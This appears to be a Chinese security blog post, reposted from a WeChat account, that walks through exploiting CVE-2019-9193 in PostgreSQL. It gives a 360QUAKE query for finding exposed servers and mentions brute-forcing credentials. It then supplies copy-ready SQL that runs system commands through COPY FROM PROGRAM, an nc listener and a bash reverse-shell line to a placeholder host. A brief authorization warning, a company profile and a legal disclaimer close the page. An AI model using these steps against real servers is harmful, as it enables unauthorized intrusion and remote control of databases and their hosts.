漏洞复现-CVE-2019-9193PostgreSQL 高权限命令执行漏洞

admin 2025年6月8日09:40:07评论15 views字数 1143阅读3分48秒阅读模式

0x01 漏洞描述

PostgreSQL( 读作 Post-Gres-Q-L)是一个功能非常强大的、源代码开放的客户/服务器关系型数据库管理系统(RDBMS)。采用类似MIT的许可协议,允许开发人员做任何事情,包括在开源或闭源产品中商用,其源代码是免费提供的。由于9.3增加一个“COPY TO/FROM PROGRAM”功能,这个功能就是允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令。

漏洞复现-CVE-2019-9193PostgreSQL 高权限命令执行漏洞

0x02 漏洞复现

漏洞影响:9.3-11.2

360QUAKE:service: "postgresql"

1.爆破PostgreSQL,得到账号密码(需要此工具公众号回复cjrkl即可获得)

漏洞复现-CVE-2019-9193PostgreSQL 高权限命令执行漏洞

2.连接,并输入如下命令,发现执行了命令并回显

DROP TABLE IF EXISTS cmd_exec;/*执行删除你想用来保存命令输出但是可能存在的表*/CREATE TABLE cmd_exec(cmd_output text);/*创建用来保存命令输出的表*/COPY cmd_exec FROM PROGRAM 'whoami';/*通过 “COPY FROM PROGRAM”执行系统命令*/SELECT * FROM cmd_exec;/*显示结果*/

漏洞复现-CVE-2019-9193PostgreSQL 高权限命令执行漏洞

3.监听一个shell

nc.exe -lvvp 5555

漏洞复现-CVE-2019-9193PostgreSQL 高权限命令执行漏洞

4.执行反弹shell命令

DROP TABLE IF EXISTS cmd_exec;/*执行删除你想用来保存命令输出但是可能存在的表*/CREATE TABLE cmd_exec(cmd_output text);/*创建用来保存命令输出的表*/COPY cmd_exec FROM PROGRAM 'bash -i >& /dev/tcp/x.x.x.x/5555 0>&1';/*通过 “COPY FROM PROGRAM”执行系统命令*/SELECT * FROM cmd_exec;/*显示结果*/

5.得到一个shell

漏洞复现-CVE-2019-9193PostgreSQL 高权限命令执行漏洞

(注:要在正规授权情况下测试网站:日站不规范,亲人泪两行)

0x03 公司简介

江西渝融云安全科技有限公司,2017年发展至今,已成为了一家集云安全、物联网安全、数据安全、等保建设、风险评估、信息技术应用创新及网络安全人才培训为一体的本地化高科技公司,是江西省信息安全产业链企业和江西省政府部门重点行业网络安全事件应急响应队伍成员。
    公司现已获得信息安全集成三级、信息系统安全运维三级、风险评估三级等多项资质认证,拥有软件著作权十八项;荣获2020年全国工控安全深度行安全攻防对抗赛三等奖;庆祝建党100周年活动信息安全应急保障优秀案例等荣誉......

编制:sm

审核:fjh

审核:Dog

原文始发于微信公众号(融云攻防实验室):漏洞复现-CVE-2019-9193PostgreSQL 高权限命令执行漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月8日09:40:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现-CVE-2019-9193PostgreSQL 高权限命令执行漏洞https://cn-sec.com/archives/841840.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息